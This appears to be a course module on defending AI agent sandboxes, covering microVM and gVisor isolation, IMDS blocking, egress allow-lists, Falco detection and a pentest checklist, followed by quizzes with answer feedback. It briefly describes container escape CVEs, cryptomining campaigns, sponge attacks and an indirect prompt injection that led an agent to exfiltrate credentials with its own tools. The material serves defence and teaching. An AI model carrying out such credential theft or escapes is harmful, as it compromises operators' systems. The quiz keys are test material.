What layered defenses most effectively prevent and detect sandbox escape and resource abuse in AI agent deployments?

At AWS re:Inforce 2023, the Amazon security team presented their internal approach to containing agentic workloads: a cell-based architecture where each agent instance runs in a dedicated AWS Firecracker microVM with no shared kernel, no shared instance, and no IMDS access. Firecracker, the same virtual machine monitor underlying AWS Lambda, gives each workload its own guest kernel behind a KVM virtualization boundary rather than relying on namespace-level isolation. The escape surface is reduced to hypervisor vulnerabilities rather than container runtime vulnerabilities. The practical cost: ~125ms cold start latency per agent invocation. For most enterprise agent deployments, this is acceptable. For real-time interactive agents, it requires architectural adjustments.

Defense in Depth: The Layered Approach

No single control eliminates sandbox escape risk. The goal is to increase the number of controls an attacker must bypass, reduce the blast radius when one layer fails, and ensure that detection can identify the failure before full compromise occurs. The following framework organizes controls from innermost (agent process) to outermost (cloud account):

Layer	Control	Threat Addressed	Implementation
Process	Drop all capabilities; use seccomp default-deny	Kernel namespace escape via CAP_SYS_ADMIN and siblings	`--cap-drop=ALL --security-opt seccomp=profile.json`
Container	Read-only root filesystem; tmpfs for /tmp	Malware staging in container filesystem	`--read-only --tmpfs /tmp:size=50m`
Runtime	gVisor (runsc) or Firecracker isolation	runc CVEs and shared kernel exploitation	`runtimeClassName: gvisor` in the Kubernetes pod spec (requires a matching RuntimeClass)
Network	Block 169.254.169.254 at CNI level; allow-list egress	IMDS credential theft	NetworkPolicy or iptables rule pre-container start
Identity	Dedicated least-privilege service account; no cluster-admin	K8s API abuse via service account token	RBAC with explicit verb/resource grants only
Account	Hard spending limits; Cost Anomaly Detection; separate billing account	LLM API cost abuse; compute hijacking	AWS Budgets; GCP quota limits; Azure cost alerts
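
The Process and Container rows above can be sketched as a small helper that assembles the `docker run` arguments and checks an existing command line for gaps. This is a minimal illustration, not a complete launcher: the function names, the image name `agent:latest`, and the choice of which flags count as required are assumptions made for the example.

```python
from typing import List

# Flags taken from the Process and Container rows of the table.
REQUIRED_FLAGS = ("--cap-drop=ALL", "--read-only")


def hardened_docker_args(image: str,
                         seccomp_profile: str = "profile.json",
                         tmp_size: str = "50m") -> List[str]:
    """Build a `docker run` argv that applies the table's container flags."""
    return [
        "docker", "run", "--rm",
        "--cap-drop=ALL",                                # drop every capability
        "--security-opt", f"seccomp={seccomp_profile}",  # custom seccomp profile
        "--read-only",                                   # read-only root filesystem
        "--tmpfs", f"/tmp:size={tmp_size}",              # small writable scratch space
        image,
    ]


def missing_hardening(argv: List[str]) -> List[str]:
    """Return the hardening flags that are absent from a docker argv."""
    missing = [flag for flag in REQUIRED_FLAGS if flag not in argv]
    if not any(arg.startswith("seccomp=") for arg in argv):
        missing.append("--security-opt seccomp=<profile>")
    return missing
```

Running `missing_hardening` over the command lines found in deployment scripts gives a quick, if shallow, check that no agent container is launched without the baseline flags.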

gVisor: The Practical Middle Ground

Google's gVisor (open-sourced 2018) interposes a user-space kernel between container processes and the host Linux kernel. Container syscalls are handled by the Sentry (gVisor's kernel implementation) rather than passed directly to the host. This means that the container cannot reach host kernel vulnerabilities directly — it must first compromise the Sentry.

Google Cloud's GKE Sandbox uses gVisor for untrusted workloads. The GKE documentation explicitly recommends it for "workloads that execute untrusted code" — a description that accurately characterizes any AI agent that executes LLM-generated code. The performance overhead is approximately 10–20% for typical workloads, increasing for syscall-intensive operations.

gVisor does not prevent IMDS access (it operates at the syscall level, not the network level), and does not prevent a container from using its permitted network access to reach internal services. It is a kernel isolation control, not a network isolation control.

Network Controls: Blocking IMDS and Egress Filtering

Blocking IMDS at the network level is the most reliable protection against credential theft via metadata service. The implementation depends on the deployment environment:

Docker standalone: iptables -I DOCKER-USER -d 169.254.169.254 -j DROP before starting agent containers. This rule persists across container restarts, but it must be applied to each host and is lost on reboot unless it is saved and restored.
Kubernetes: A NetworkPolicy that selects agent pods and excludes 169.254.169.254/32 from allowed egress. NetworkPolicy rules are allow-only, so this is expressed as an egress ipBlock with 169.254.169.254/32 listed under except. Additionally, confirm that the CNI (Calico, Cilium) enforces the policy at the dataplane level, as not all CNI plugins enforce NetworkPolicy.
AWS EKS: Requiring IMDSv2 (HttpTokens set to required) with hop limit 1 prevents IMDS access from containers on a bridged or pod network, because the token response cannot travel past the instance to the container. Pods that use hostNetwork are not covered. Verify the settings: aws ec2 describe-instances --query 'Reservations[].Instances[].MetadataOptions'.
Egress allow-list: Define the specific external endpoints the agent legitimately needs to reach. Block all other egress. This eliminates the network amplification abuse vector and makes exfiltration via the agent's HTTP tool observable as an anomaly.
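
The Kubernetes and allow-list items above can be sketched as a generator for a NetworkPolicy manifest plus a small local evaluator for reasoning about it. This is a sketch under stated assumptions: the policy name, the `app: ai-agent` label, and both function names are hypothetical, only IPv4 ipBlock peers are modeled, and the evaluator is not a substitute for testing enforcement on the real CNI.

```python
import ipaddress
from typing import Dict, List

IMDS = ipaddress.ip_network("169.254.169.254/32")


def agent_egress_policy(allowed_cidrs: List[str],
                        app_label: str = "ai-agent") -> Dict:
    """Build an allow-list egress NetworkPolicy that never admits IMDS."""
    peers = []
    for cidr in allowed_cidrs:
        net = ipaddress.ip_network(cidr)
        if net == IMDS:
            raise ValueError("the IMDS address must not be allow-listed")
        block = {"cidr": str(net)}
        # `except` entries must fall strictly inside the cidr they modify.
        if net.version == 4 and IMDS.subnet_of(net):
            block["except"] = [str(IMDS)]
        peers.append({"ipBlock": block})
    return {
        "apiVersion": "networking.k8s.io/v1",
        "kind": "NetworkPolicy",
        "metadata": {"name": "agent-egress-allowlist"},
        "spec": {
            "podSelector": {"matchLabels": {"app": app_label}},
            "policyTypes": ["Egress"],
            # An empty `to` list would allow every destination, so an empty
            # allow-list is rendered as no egress rules at all (deny all).
            "egress": [{"to": peers}] if peers else [],
        },
    }


def egress_allowed(policy: Dict, dest_ip: str) -> bool:
    """Local model of the policy: is dest_ip inside any allowed ipBlock?"""
    ip = ipaddress.ip_address(dest_ip)
    for rule in policy["spec"]["egress"]:
        for peer in rule.get("to", []):
            block = peer["ipBlock"]
            if ip not in ipaddress.ip_network(block["cidr"]):
                continue
            excluded = any(ip in ipaddress.ip_network(e)
                           for e in block.get("except", []))
            if not excluded:
                return True
    return False
```

A policy like this also blocks DNS unless the cluster DNS service is explicitly allowed, so a real allow-list usually needs an additional rule for it.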

IMDSv2 Hop Limit Detail

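IMDSv2 requires a PUT request to obtain a session token before GETs are accepted. The instance metadata hop limit (HttpPutResponseHopLimit) sets the IP TTL on the response that carries that token. With a hop limit of 1, the response can reach a process on the instance itself, but it is dropped at the extra network hop introduced by a container bridge or pod network, so the container never receives a session token. This blocks IMDSv2 access from containers without blocking it from processes on the host. Two caveats apply. First, the instance must also require IMDSv2 (HttpTokens set to required), because otherwise tokenless IMDSv1 GETs still succeed from inside the container. Second, containers that share the host network namespace (for example, pods with hostNetwork: true) are not separated by an extra hop. The EC2 API default hop limit is 1, but AMIs and launch templates can override it, so check the value rather than assume it.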
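
As a rough way to audit these settings across a fleet, the sketch below walks the JSON returned by `aws ec2 describe-instances` (the full response, not the filtered `--query` output) and reports instances whose metadata options would still let a container reach IMDS. The function name and the wording of the findings are assumptions; the field names `HttpEndpoint`, `HttpTokens`, and `HttpPutResponseHopLimit` are those of the EC2 `MetadataOptions` structure.

```python
from typing import Dict, List


def imds_findings(describe_instances: Dict) -> List[str]:
    """Flag instances whose IMDS settings allow access from containers."""
    findings = []
    for reservation in describe_instances.get("Reservations", []):
        for instance in reservation.get("Instances", []):
            instance_id = instance.get("InstanceId", "<unknown>")
            opts = instance.get("MetadataOptions", {})
            if opts.get("HttpEndpoint") == "disabled":
                continue  # IMDS is switched off entirely; nothing to reach
            if opts.get("HttpTokens") != "required":
                findings.append(
                    f"{instance_id}: IMDSv1 still accepted (HttpTokens is not 'required')")
            hop_limit = opts.get("HttpPutResponseHopLimit")
            if hop_limit is None:
                findings.append(f"{instance_id}: hop limit not reported")
            elif hop_limit > 1:
                findings.append(
                    f"{instance_id}: hop limit {hop_limit} lets token responses reach containers")
    return findings
```

An empty result means every instance in the response either has IMDS disabled or requires IMDSv2 with a hop limit of 1. It says nothing about pods that run with hostNetwork, which need a separate check.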

Resource Quotas and Cgroups

Cgroup-based resource limits are a necessary but insufficient control against resource abuse. A container CPU limit of 0.5 cores prevents a miner from consuming all host CPU, but the miner still runs, generates costs, and produces external network signatures. Resource limits should be set at realistic values based on measured normal agent behavior, not arbitrary defaults. Limits set too high provide no meaningful protection; limits set too low cause legitimate agent task failures.

In Kubernetes, set both requests and limits for each container in the pod spec. Requests affect scheduling; limits are enforced through cgroups. For AI agent pods, set CPU limits based on the 95th percentile of observed inference CPU usage, and memory limits based on the memory needed for the maximum expected context size plus a 20% buffer.

# Kubernetes resource limits for AI agent pod
resources:
  requests:
    cpu: "500m"
    memory: "1Gi"
  limits:
    cpu: "2000m"     # 2 cores max — limits miner impact
    memory: "4Gi"    # Prevents memory-based DoS
    ephemeral-storage: "1Gi"  # Prevents storage abuse
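
To show how the sizing guidance above might be turned into numbers, the sketch below derives a CPU limit from the 95th percentile of observed usage and a memory limit from a measured maximum plus a 20% buffer. The function names are hypothetical, the nearest-rank percentile method is one reasonable choice among several, and inputs are assumed to be whole millicores and MiB.

```python
from typing import Sequence


def percentile_nearest_rank(samples: Sequence[int], pct: int) -> int:
    """Nearest-rank percentile over integer samples (pct from 1 to 100)."""
    if not samples:
        raise ValueError("need at least one sample")
    ordered = sorted(samples)
    # Ceiling division in integers avoids floating-point rounding surprises.
    rank = max(1, -(-pct * len(ordered) // 100))
    return ordered[rank - 1]


def cpu_limit(cpu_samples_millicores: Sequence[int]) -> str:
    """CPU limit as a Kubernetes quantity, from the p95 of observed usage."""
    return f"{percentile_nearest_rank(cpu_samples_millicores, 95)}m"


def memory_limit(max_expected_mib: int, buffer_pct: int = 20) -> str:
    """Memory limit as a Kubernetes quantity: measured maximum plus a buffer."""
    with_buffer = -(-max_expected_mib * (100 + buffer_pct) // 100)  # round up
    return f"{with_buffer}Mi"
```

For example, twenty CPU samples evenly spaced from 100m to 2000m give a limit of `1900m`, and a measured maximum of 3072 MiB gives `3687Mi`.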

Runtime Detection: eBPF-Based Monitoring

Falco (CNCF, originally from Sysdig) uses eBPF to observe kernel syscalls and generate alerts on anomalous behavior. For AI agent sandboxes, the most valuable Falco rules are those that detect: unexpected process spawning from the agent runtime, outbound connections to unexpected destinations, writes to executable paths outside expected working directories, and attempts to read sensitive filesystem paths like /proc/self/mem or service account tokens.

In 2022, the Sysdig Threat Research Team documented a Falco rule set specifically targeting cryptominer behavior: detection of processes whose binary names or hashes match known miners, and detection of connections to mining pool hostnames drawn from public threat intelligence feeds. Because these rules are evaluated on kernel-level events collected outside the container, they add little performance overhead and are difficult for the container process to tamper with.
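
The matching logic behind such rules can be illustrated in a few lines. The sketch below is not Falco rule syntax and does not use any Falco API; it only models the two checks described above over a hypothetical event stream. The `Event` type, the function name, and both lookup sets are assumptions, and the pool hostname is a placeholder.

```python
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Illustrative values only; a real deployment would load these from
# threat intelligence feeds.
KNOWN_MINER_NAMES = {"xmrig", "minerd"}
KNOWN_POOL_HOSTS = {"pool.example.invalid"}  # placeholder hostname


@dataclass(frozen=True)
class Event:
    kind: str                        # "exec" or "connect"
    process: str                     # name of the process that acted
    dest_host: Optional[str] = None  # set for "connect" events


def miner_alerts(events: Iterable[Event]) -> List[str]:
    """Return one alert per event that matches a miner indicator."""
    alerts = []
    for ev in events:
        if ev.kind == "exec" and ev.process.lower() in KNOWN_MINER_NAMES:
            alerts.append(f"miner process started: {ev.process}")
        elif ev.kind == "connect" and ev.dest_host in KNOWN_POOL_HOSTS:
            alerts.append(f"{ev.process} connected to mining pool {ev.dest_host}")
    return alerts
```

Name matching alone is easy to defeat by renaming the binary, which is why the network indicator is checked independently of the process name.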

Pentest Validation Checklist

After implementing defenses, validate with the following tests, and document pass/fail for each test with evidence:
(1) Attempt an IMDS request from inside the agent container, both a plain GET and the IMDSv2 token PUT. Both should be refused or time out.
(2) Attempt to read /var/run/secrets/. Verify that the mount is absent or that the service account token has minimal RBAC.
(3) Run capsh --print, or read CapEff in /proc/self/status. Verify that no dangerous capabilities are present.
(4) Attempt to spawn a process outside the expected agent runtime. Verify that Falco generates an alert.
(5) Attempt to write and run an executable in /tmp. Verify that the write is blocked (read-only filesystem), that execution is blocked (tmpfs mounted noexec), or that the attempt is immediately detected.
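
Test (3) can be partly automated by decoding the CapEff bitmask. The sketch below parses the contents of /proc/self/status and lists any set bits from a short list of capabilities. The bit numbers come from the Linux capability definitions; which capabilities count as dangerous is an assumption made for this example, and the function names are hypothetical.

```python
import re
from typing import List

# Bit positions from the Linux capability list. The selection of
# "dangerous" capabilities is illustrative, not exhaustive.
DANGEROUS_CAPS = {
    2: "CAP_DAC_READ_SEARCH",
    12: "CAP_NET_ADMIN",
    13: "CAP_NET_RAW",
    16: "CAP_SYS_MODULE",
    19: "CAP_SYS_PTRACE",
    21: "CAP_SYS_ADMIN",
}


def cap_eff_from_status(status_text: str) -> int:
    """Extract the effective capability mask from /proc/<pid>/status text."""
    match = re.search(r"^CapEff:\s*([0-9a-fA-F]+)\s*$", status_text, re.MULTILINE)
    if match is None:
        raise ValueError("no CapEff line found")
    return int(match.group(1), 16)


def dangerous_caps(cap_eff: int) -> List[str]:
    """Names of the listed capabilities whose bit is set in the mask."""
    return [name for bit, name in sorted(DANGEROUS_CAPS.items())
            if cap_eff & (1 << bit)]
```

Inside the agent container, pass the contents of /proc/self/status to `cap_eff_from_status` and the result to `dangerous_caps`. A container started with all capabilities dropped should yield an empty list, while Docker's default capability set still reports CAP_NET_RAW.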

Service Mesh and Zero-Trust Networking

A service mesh (Istio, Linkerd) provides mutual TLS between services and allows policy-based enforcement of which agent pods can communicate with which internal services. This adds an authentication layer that is independent of network-level IP allow-lists. Even if an agent escapes its container namespace, other services still require a valid workload certificate before accepting a connection, and the escaped process does not hold one by default. This is not absolute: an attacker who gains root on the node may be able to steal the certificates of pods scheduled there, so the mesh limits lateral movement rather than eliminating it.

Zero-trust networking for AI agents means: no agent can call any internal service by default. Each inter-service communication requires an explicit policy grant. This is operationally demanding but dramatically reduces the blast radius of any single agent compromise.
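
The default-deny model described above reduces to a simple rule: a call is permitted only if an explicit grant names both the caller's identity and the destination. The sketch below illustrates that rule in isolation. It is not Istio or Linkerd configuration; the class name and the identity and service strings are hypothetical.

```python
from typing import Iterable, Tuple


class DefaultDenyPolicy:
    """Allow a call only when an explicit (source, destination) grant exists."""

    def __init__(self, grants: Iterable[Tuple[str, str]]) -> None:
        self._grants = frozenset(grants)

    def is_allowed(self, source_identity: str, dest_service: str) -> bool:
        # No wildcard and no fallback: anything not granted is denied.
        return (source_identity, dest_service) in self._grants


policy = DefaultDenyPolicy([
    ("agent-research", "search-api"),
    ("agent-research", "document-store"),
])
```

With these grants, `policy.is_allowed("agent-research", "search-api")` is true, while a call from the same agent to an ungranted service such as `"billing-api"` is denied, as is any call from an identity that has no grants at all.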

Lesson 4 Quiz

Defenses, Detection, and Hardening · 3 questions

Amazon's cell-based architecture for agent workloads (as presented at re:Inforce 2023) achieves stronger isolation than standard container runtimes because:

Correct. Firecracker provides microVM isolation — each agent's kernel is separate from the host kernel. An escape requires compromising the hypervisor, not just the container runtime. This is a fundamentally stronger boundary than Linux namespace isolation, at the cost of slightly higher cold start latency (~125ms).

Incorrect. The key mechanism is Firecracker microVM isolation — each agent gets its own kernel. This eliminates shared-kernel exploitation paths that affect container runtimes like runc/containerd.

Setting the IMDSv2 hop limit to 1 on an EKS node prevents container-level IMDS access because:

Correct. The hop limit sets the IP TTL on the IMDSv2 PUT response that carries the session token. With a hop limit of 1, that response is dropped at the extra network hop between the instance and the container, so the container never receives a token. Host processes are not behind that extra hop, so they still receive it. This assumes IMDSv2 is required; otherwise tokenless IMDSv1 GETs still work.

Incorrect. The hop limit mechanism works via TTL: the PUT response carrying the session token leaves IMDS with TTL=1 and is dropped at the extra network hop in front of the container. This blocks container access while preserving host-level access.

gVisor protects against which of the following threats, but does NOT protect against which?

Correct. gVisor interposes at the syscall boundary, preventing container processes from directly invoking host kernel code — this defeats runc CVEs and kernel namespace exploits. However, gVisor does not filter network traffic. A container running under gVisor can still reach 169.254.169.254 and make arbitrary outbound connections. Network controls are still required separately.

Incorrect. gVisor operates at the syscall level — it interposes between container processes and the host kernel. This protects against kernel exploitation but does not filter network traffic. IMDS access and outbound network abuse require separate network-level controls.

Lab 4: Hardening Design Review

Build a defense-in-depth configuration for a production AI agent deployment

Scenario

Your organization is deploying a LangChain-based AI agent on AWS EKS. The agent has web-browsing, file-read, shell-execution, and external API call tools. You need to design the complete security configuration: container hardening, network controls, RBAC, runtime isolation, and detection. The assistant will review your proposed configurations and identify gaps.

Start by describing your proposed container configuration (e.g., capabilities dropped, seccomp profile, read-only filesystem) and asking the assistant to identify gaps — or ask the assistant where to begin designing the security configuration for an agent with shell execution capabilities.

Module 6 Test

Sandbox Escape and Resource Abuse · 15 questions · Pass at 80%

1. In the 2023 Wiz Hugging Face Spaces disclosure, no kernel exploit was required because the attacker could reach what resource from inside the container?

Correct.

Incorrect. The IMDS at 169.254.169.254 was the attack vector — reachable via plain HTTP GET with no kernel exploit required.

2. CVE-2019-5736 allowed a malicious container to compromise the host by:

Correct. The runc binary overwrite via file descriptor race is the core mechanism of CVE-2019-5736.

Incorrect. CVE-2019-5736 exploited a race condition against the runc binary itself — the container process could overwrite the host runc by racing a file descriptor opened during container startup.

3. When a Kubernetes pod is started, what credential is automatically available to the container process by default?

Correct.

Incorrect. By default, Kubernetes mounts the pod's service account token at /var/run/secrets/kubernetes.io/serviceaccount/token. IRSA is an optional additional mechanism.

4. Which Linux capability must be present for a container process to mount filesystems and use nsenter to re-enter the host namespace?

Correct. CAP_SYS_ADMIN is the broadest and most dangerous capability, enabling mount operations and namespace manipulation.

Incorrect. CAP_SYS_ADMIN is required for mounting filesystems and namespace manipulation.

5. Google Cloud's metadata server requires a specific HTTP header on every request. Why is this insufficient to protect against AI agent-based credential theft?

Correct. Required headers stop SSRF via image tags or browser redirects because those mechanisms cannot set arbitrary headers. An agent's HTTP tool call is a direct programmatic request that can include any header.

Incorrect. The required header (Metadata-Flavor: Google) is trivially settable by any agent HTTP tool. This protection only stops SSRF via uncontrolled request mechanisms like HTML img tags.

6. TeamTNT's cryptomining campaigns specifically targeted Jupyter notebook servers because:

Correct. Unauthenticated Jupyter instances accept arbitrary Python execution. TeamTNT used this to download and run XMRig, exploiting the compute resources intended for ML workloads.

Incorrect. The key vulnerability is unauthenticated code execution — Jupyter notebooks without authentication allow any visitor to run arbitrary Python, including subprocess calls that download and run miners.

7. A sponge attack against an AI agent system aims to:

Correct. Sponge attacks craft inputs that maximize model compute expenditure — increasing inference latency, exhausting rate limits, and generating cost spikes that can be weaponized against production agent deployments.

Incorrect. A sponge attack maximizes inference compute by crafting pathological inputs. It requires no code execution or credential access — just the ability to send inputs to the agent.

8. What is the primary advantage of using Firecracker microVMs over standard container runtimes (runc) for AI agent isolation?

Correct. The fundamental security advantage of Firecracker is kernel isolation. CVEs in runc, containerd, or the Linux kernel namespace implementation cannot be exploited cross-microVM because each agent's kernel is separate from the host kernel.

Incorrect. The security advantage is kernel isolation — each microVM runs its own kernel. Escape requires a hypervisor bug, not just a container runtime or kernel namespace bug.

9. Why does setting IMDSv2 hop limit to 1 block container IMDS access while preserving host-level access?

Correct. This is TTL-based enforcement: the hop limit sets the TTL on the PUT response that carries the session token. With a hop limit of 1, the response is dropped at the extra network hop in front of the container, so the container never receives a token. Host processes are not behind that hop and receive the response normally.

Incorrect. The mechanism is TTL-based: the hop limit sets the TTL on the PUT response that carries the session token. With hop-limit=1, the response is dropped at the extra network hop before it reaches the container. Host processes are not behind that hop, so they still receive the token.

10. gVisor interposes between the container and the host at which system boundary?

Correct. gVisor's Sentry is a user-space kernel implementation that handles container syscalls. The host kernel never receives direct syscalls from the container process, eliminating shared-kernel exploitation paths.

Incorrect. gVisor operates at the syscall boundary. Its Sentry component implements kernel syscall handling in user space, so container processes cannot directly invoke host kernel code.

11. In the 2024 PromptArmor indirect prompt injection research, credential exfiltration was accomplished by:

Correct. The PromptArmor research demonstrated that indirect prompt injection can cause an agent to use its own legitimate tools for exfiltration — making the malicious action invisible in the task output and indistinguishable from normal tool use without behavioral analysis.

Incorrect. The exfiltration used the agent's own web request tool — triggered by a prompt injection in a document the agent processed. No exploit or code execution was required; the agent's permitted capabilities were weaponized.

12. When testing an AI agent deployment for resource abuse risk, which combination of findings is most indicative of active cryptomining?

Correct. The dual signal — sustained non-event-correlated CPU plus Stratum protocol connections to known mining pool addresses — is the most reliable indicator of cryptomining in an environment where high CPU is otherwise expected.

Incorrect. High LLM token consumption with no output is more indicative of a prompt injection loop or sponge attack. Cryptomining's signature is sustained CPU without LLM API activity, combined with mining pool network connections.

13. A Kubernetes NetworkPolicy that blocks egress to 169.254.169.254 may be insufficient on its own because:

Correct. NetworkPolicy is a Kubernetes API object, but enforcement is delegated to the CNI plugin. Some CNI plugins (notably older versions or basic implementations) do not implement all NetworkPolicy features. The recommendation is to verify at the CNI dataplane level, not just apply the policy object.

Incorrect. The key limitation is CNI enforcement: NetworkPolicy objects are enforced by the CNI plugin, and not all plugins implement all features. The policy must be verified at the actual network dataplane.

14. CVE-2022-0492, which affected AI agent workloads on unpatched Kubernetes nodes, exploited which mechanism?

Correct. CVE-2022-0492 exploited the cgroup v1 release_agent mechanism — a file that the kernel executes when a cgroup becomes empty. With appropriate conditions (container with CAP_SYS_ADMIN or misconfigured user namespaces), this allowed host root execution from inside the container.

Incorrect. CVE-2022-0492 is a Linux kernel flaw in cgroup v1 release_agent — a file executed by the kernel when a cgroup empties. It enables host root access from inside a container under certain capability conditions.

15. The OWASP LLM Top 10 "Excessive Agency" vulnerability (LLM06) is directly relevant to resource abuse because:

Correct. Excessive Agency means the agent has capabilities beyond what its task requires. Every excess capability is additional abuse surface. An agent that only needs to read a database has no business with outbound HTTP, shell execution, or write access — granting those capabilities converts every successful attack into a broader incident.

Incorrect. Excessive Agency (LLM06) describes the condition of granting an agent more capabilities than necessary. From a resource abuse perspective, excess network and compute access means any attacker who influences the agent can leverage those capabilities for abuse.